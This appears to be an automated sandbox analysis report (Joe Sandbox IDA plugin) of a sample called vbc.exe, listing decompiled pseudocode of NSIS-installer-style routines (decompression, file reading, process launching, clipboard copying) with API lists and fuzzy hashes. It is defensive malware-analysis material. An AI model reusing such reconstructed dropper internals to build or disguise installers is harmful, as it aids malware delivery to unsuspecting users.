                          												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          												 *(__ebp - 0x44) = __ebx;
                          												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          													__ecx =  *(__ebp - 0x10);
                          													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          													__ebx = __ebx | 0x00000001;
                          													__eflags = __ebx;
                          													 *(__ebp - 0x44) = __ebx;
                          												}
                          												__eflags =  *(__ebp - 0x10) - 0x1000000;
                          												if( *(__ebp - 0x10) >= 0x1000000) {
                          													L101:
                          													_t338 = __ebp - 0x48;
                          													 *_t338 =  *(__ebp - 0x48) - 1;
                          													__eflags =  *_t338;
                          													goto L102;
                          												} else {
                          													goto L99;
                          												}
                          											}
                          											__edx =  *(__ebp - 4);
                          											__eax = __eax - __ebx;
                          											 *(__ebp - 0x40) = __ecx;
                          											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          											goto L108;
                          										case 0x1a:
                          											L56:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1a;
                          												goto L170;
                          											}
                          											__ecx =  *(__ebp - 0x68);
                          											__al =  *(__ebp - 0x5c);
                          											__edx =  *(__ebp - 8);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          											 *( *(__ebp - 0x68)) = __al;
                          											__ecx =  *(__ebp - 0x14);
                          											 *(__ecx +  *(__ebp - 8)) = __al;
                          											__eax = __ecx + 1;
                          											__edx = 0;
                          											_t192 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t192;
                          											goto L79;
                          										case 0x1b:
                          											L75:
                          											__eflags =  *(__ebp - 0x64);
                          											if( *(__ebp - 0x64) == 0) {
                          												 *(__ebp - 0x88) = 0x1b;
                          												goto L170;
                          											}
                          											__eax =  *(__ebp - 0x14);
                          											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          											__eflags = __eax -  *(__ebp - 0x74);
                          											if(__eax >=  *(__ebp - 0x74)) {
                          												__eax = __eax +  *(__ebp - 0x74);
                          												__eflags = __eax;
                          											}
                          											__edx =  *(__ebp - 8);
                          											__cl =  *(__eax + __edx);
                          											__eax =  *(__ebp - 0x14);
                          											 *(__ebp - 0x5c) = __cl;
                          											 *(__eax + __edx) = __cl;
                          											__eax = __eax + 1;
                          											__edx = 0;
                          											_t274 = __eax %  *(__ebp - 0x74);
                          											__eax = __eax /  *(__ebp - 0x74);
                          											__edx = _t274;
                          											__eax =  *(__ebp - 0x68);
                          											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          											_t283 = __ebp - 0x64;
                          											 *_t283 =  *(__ebp - 0x64) - 1;
                          											__eflags =  *_t283;
                          											 *( *(__ebp - 0x68)) = __cl;
                          											L79:
                          											 *(__ebp - 0x14) = __edx;
                          											goto L80;
                          										case 0x1c:
                          											while(1) {
                          												L123:
                          												__eflags =  *(__ebp - 0x64);
                          												if( *(__ebp - 0x64) == 0) {
                          													break;
                          												}
                          												__eax =  *(__ebp - 0x14);
                          												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          												__eflags = __eax -  *(__ebp - 0x74);
                          												if(__eax >=  *(__ebp - 0x74)) {
                          													__eax = __eax +  *(__ebp - 0x74);
                          													__eflags = __eax;
                          												}
                          												__edx =  *(__ebp - 8);
                          												__cl =  *(__eax + __edx);
                          												__eax =  *(__ebp - 0x14);
                          												 *(__ebp - 0x5c) = __cl;
                          												 *(__eax + __edx) = __cl;
                          												__eax = __eax + 1;
                          												__edx = 0;
                          												_t414 = __eax %  *(__ebp - 0x74);
                          												__eax = __eax /  *(__ebp - 0x74);
                          												__edx = _t414;
                          												__eax =  *(__ebp - 0x68);
                          												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          												__eflags =  *(__ebp - 0x30);
                          												 *( *(__ebp - 0x68)) = __cl;
                          												 *(__ebp - 0x14) = _t414;
                          												if( *(__ebp - 0x30) > 0) {
                          													continue;
                          												} else {
                          													L80:
                          													 *(__ebp - 0x88) = 2;
                          													goto L1;
                          												}
                          											}
                          											 *(__ebp - 0x88) = 0x1c;
                          											goto L170;
                          									}
                          								}
                          								L171:
                          								_t535 = _t534 | 0xffffffff;
                          								goto L172;
                          							}
                          						}
                          					}
                          				}
                          			}













                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00406231
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
                          0x004063cc
                          0x004063cf
                          0x004063d1
                          0x004063d1
                          0x004063d1
                          0x004063d4
                          0x004063d7
                          0x004063da
                          0x004063dd
                          0x004063e0
                          0x004063e3
                          0x004063e4
                          0x004063e6
                          0x004063e6
                          0x004063e6
                          0x004063e9
                          0x004063ec
                          0x004063ef
                          0x004063f2
                          0x004063f2
                          0x004063f2
                          0x004063f5
                          0x004063f7
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x00406639
                          0x00406639
                          0x00406639
                          0x0040663d
                          0x00000000
                          0x00000000
                          0x00406643
                          0x00406646
                          0x00406649
                          0x0040664c
                          0x0040664e
                          0x0040664e
                          0x0040664e
                          0x00406651
                          0x00406654
                          0x00406657
                          0x0040665a
                          0x0040665d
                          0x00406660
                          0x00406661
                          0x00406663
                          0x00406663
                          0x00406663
                          0x00406666
                          0x00406669
                          0x0040666c
                          0x0040666f
                          0x00406672
                          0x00406676
                          0x00406678
                          0x0040667b
                          0x00000000
                          0x0040667d
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040667b
                          0x004068b0
                          0x00000000
                          0x00000000
                          0x00405edf
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00406734
                          0x004066bb
                          0x004066b8

                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                          • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                          • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E00401E1B() {
                          				void* _t15;
                          				void* _t24;
                          				void* _t26;
                          				void* _t31;
                          
                          				_t28 = E004029E8(_t24);
                          				E00404E23(0xffffffeb, _t13);
                          				_t15 = E004052E5(_t28); // executed
                          				 *(_t31 + 8) = _t15;
                          				if(_t15 == _t24) {
                          					 *((intOrPtr*)(_t31 - 4)) = 1;
                          				} else {
                          					if( *((intOrPtr*)(_t31 - 0x1c)) != _t24) {
                          						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
                          							E00405DDC(0xf);
                          						}
                          						GetExitCodeProcess( *(_t31 + 8), _t31 - 8); // executed
                          						if( *((intOrPtr*)(_t31 - 0x20)) < _t24) {
                          							if( *(_t31 - 8) != _t24) {
                          								 *((intOrPtr*)(_t31 - 4)) = 1;
                          							}
                          						} else {
                          							E004059E3(_t26,  *(_t31 - 8));
                          						}
                          					}
                          					_push( *(_t31 + 8));
                          					CloseHandle();
                          				}
                          				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t31 - 4));
                          				return 0;
                          			}








                          APIs
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                            • Part of subcall function 004052E5: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                            • Part of subcall function 004052E5: CloseHandle.KERNEL32(?), ref: 00405317
                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E55
                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E65
                          • CloseHandle.KERNEL32(?), ref: 00401E8A
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                          • String ID:
                          • API String ID: 3521207402-0
                          • Opcode ID: 3016e669bbaa0abdb16a27774c796dbae6618c448dd831d606e4ec67ec548621
                          • Instruction ID: bfc20476be5fc53685a683b8d0a1b3bf328c1b7f56aae3e5f2b845df029897a9
                          • Opcode Fuzzy Hash: 3016e669bbaa0abdb16a27774c796dbae6618c448dd831d606e4ec67ec548621
                          • Instruction Fuzzy Hash: 63016971904104EBCF11AFA1CD85AAE7A71EF01358F20807BEA01B61E1C7798A81DB9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004035A6() {
                          				void* _t1;
                          				void* _t2;
                          				void* _t3;
                          				void* _t6;
                          				signed int _t11;
                          
                          				_t1 =  *0x409010; // 0xffffffff
                          				if(_t1 != 0xffffffff) {
                          					CloseHandle(_t1); // executed
                          					 *0x409010 =  *0x409010 | 0xffffffff;
                          				}
                          				_t2 =  *0x409014; // 0xffffffff
                          				if(_t2 != 0xffffffff) {
                          					CloseHandle(_t2);
                          					 *0x409014 =  *0x409014 | 0xffffffff;
                          					_t11 =  *0x409014;
                          				}
                          				_t3 = E004053AA(_t6, _t11, "C:\\Users\\Albus\\AppData\\Local\\Temp\\nsf9C33.tmp\\", 7); // executed
                          				return _t3;
                          			}









                          APIs
                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 004035B8
                          • CloseHandle.KERNEL32(FFFFFFFF), ref: 004035CC
                          Strings
                          • C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\, xrefs: 004035D7
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CloseHandle
                          • String ID: C:\Users\user\AppData\Local\Temp\nsf9C33.tmp\
                          • API String ID: 2962429428-1235799324
                          • Opcode ID: be55e5b8e427b8cdde6b00384d0871a0199eafcfb6d9273a338719d70b1cafbd
                          • Instruction ID: d1c705f3b128fbcbfce68daea097d08065639d5fc9d79a491b5de1c55189a292
                          • Opcode Fuzzy Hash: be55e5b8e427b8cdde6b00384d0871a0199eafcfb6d9273a338719d70b1cafbd
                          • Instruction Fuzzy Hash: 1EE0C230904610A6C630AF3CBE499063A286B413317200B22F174F21F1C778AE429AA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E00401389(signed int _a4) {
                          				intOrPtr* _t6;
                          				void* _t8;
                          				void* _t10;
                          				signed int _t11;
                          				void* _t12;
                          				intOrPtr _t15;
                          				signed int _t16;
                          				signed int _t17;
                          				void* _t18;
                          
                          				_t17 = _a4;
                          				while(_t17 >= 0) {
                          					_t15 =  *0x423ed0; // 0x8c1564
                          					_t6 = _t17 * 0x1c + _t15;
                          					if( *_t6 == 1) {
                          						break;
                          					}
                          					_push(_t6); // executed
                          					_t8 = E00401434(); // executed
                          					if(_t8 == 0x7fffffff) {
                          						return 0x7fffffff;
                          					}
                          					_t10 = E0040136D(_t8);
                          					if(_t10 != 0) {
                          						_t11 = _t10 - 1;
                          						_t16 = _t17;
                          						_t17 = _t11;
                          						_t12 = _t11 - _t16;
                          					} else {
                          						_t12 = _t10 + 1;
                          						_t17 = _t17 + 1;
                          					}
                          					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                          						 *0x42368c =  *0x42368c + _t12;
                          						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                          					}
                          				}
                          				return 0;
                          			}













                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID:
                          • API String ID: 3850602802-0
                          • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                          • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                          • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E0040575C(CHAR* _a4, long _a8, long _a12) {
                          				signed int _t5;
                          				void* _t6;
                          
                          				_t5 = GetFileAttributesA(_a4); // executed
                          				asm("sbb ecx, ecx");
                          				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                          				return _t6;
                          			}






                          APIs
                          • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\Public\vbc.exe,80000000,00000003), ref: 00405760
                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$AttributesCreate
                          • String ID:
                          • API String ID: 415043291-0
                          • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                          • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                          • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0040573D(CHAR* _a4) {
                          				signed char _t3;
                          				int _t5;
                          
                          				_t3 = GetFileAttributesA(_a4); // executed
                          				if(_t3 != 0xffffffff) {
                          					_t5 = SetFileAttributesA(_a4, _t3 & 0x000000fe); // executed
                          					return _t5;
                          				}
                          				return _t3;
                          			}






                          APIs
                          • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405753
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                          • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004031A8(void* _a4, long _a8) {
                          				int _t6;
                          				long _t10;
                          
                          				_t10 = _a8;
                          				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                          				if(_t6 == 0 || _a8 != _t10) {
                          					return 0;
                          				} else {
                          					return 1;
                          				}
                          			}






                          APIs
                          • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038), ref: 004031BF
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                          • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                          • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004031DA(long _a4) {
                          				long _t2;
                          
                          				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                          				return _t2;
                          			}





                          APIs
                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                          • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                          • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                          				struct HWND__* _v8;
                          				long _v12;
                          				struct tagRECT _v28;
                          				void* _v36;
                          				signed int _v40;
                          				int _v44;
                          				int _v48;
                          				signed int _v52;
                          				int _v56;
                          				void* _v60;
                          				void* _v68;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				long _t87;
                          				unsigned int _t92;
                          				unsigned int _t93;
                          				int _t94;
                          				int _t95;
                          				long _t98;
                          				void* _t101;
                          				intOrPtr _t112;
                          				intOrPtr _t123;
                          				struct HWND__* _t127;
                          				int _t149;
                          				int _t150;
                          				struct HWND__* _t154;
                          				struct HWND__* _t158;
                          				struct HMENU__* _t160;
                          				long _t162;
                          				void* _t163;
                          				short* _t164;
                          
                          				_t154 =  *0x423684; // 0x0
                          				_t149 = 0;
                          				_v8 = _t154;
                          				if(_a8 != 0x110) {
                          					__eflags = _a8 - 0x405;
                          					if(_a8 == 0x405) {
                          						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                          					}
                          					__eflags = _a8 - 0x111;
                          					if(_a8 != 0x111) {
                          						L17:
                          						__eflags = _a8 - 0x404;
                          						if(_a8 != 0x404) {
                          							L25:
                          							__eflags = _a8 - 0x7b;
                          							if(_a8 != 0x7b) {
                          								goto L20;
                          							}
                          							__eflags = _a12 - _t154;
                          							if(_a12 != _t154) {
                          								goto L20;
                          							}
                          							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                          							__eflags = _t87 - _t149;
                          							_a8 = _t87;
                          							if(_t87 <= _t149) {
                          								L37:
                          								return 0;
                          							}
                          							_t160 = CreatePopupMenu();
                          							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                          							_t92 = _a16;
                          							__eflags = _t92 - 0xffffffff;
                          							if(_t92 != 0xffffffff) {
                          								_t150 = _t92;
                          								_t93 = _t92 >> 0x10;
                          								__eflags = _t93;
                          								_t94 = _t93;
                          							} else {
                          								GetWindowRect(_t154,  &_v28);
                          								_t150 = _v28.left;
                          								_t94 = _v28.top;
                          							}
                          							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                          							_t162 = 1;
                          							__eflags = _t95 - 1;
                          							if(_t95 == 1) {
                          								_v60 = _t149;
                          								_v48 = 0x420498;
                          								_v44 = 0xfff;
                          								_a4 = _a8;
                          								do {
                          									_a4 = _a4 - 1;
                          									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
                          									__eflags = _a4 - _t149;
                          									_t162 = _t162 + _t98 + 2;
                          								} while (_a4 != _t149);
                          								OpenClipboard(_t149);
                          								EmptyClipboard();
                          								_t101 = GlobalAlloc(0x42, _t162);
                          								_a4 = _t101;
                          								_t163 = GlobalLock(_t101);
                          								do {
                          									_v48 = _t163;
                          									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
                          									 *_t164 = 0xa0d;
                          									_t163 = _t164 + 2;
                          									_t149 = _t149 + 1;
                          									__eflags = _t149 - _a8;
                          								} while (_t149 < _a8);
                          								GlobalUnlock(_a4);
                          								SetClipboardData(1, _a4);
                          								CloseClipboard();
                          							}
                          							goto L37;
                          						}
                          						__eflags =  *0x42366c - _t149; // 0x7fffffff
                          						if(__eflags == 0) {
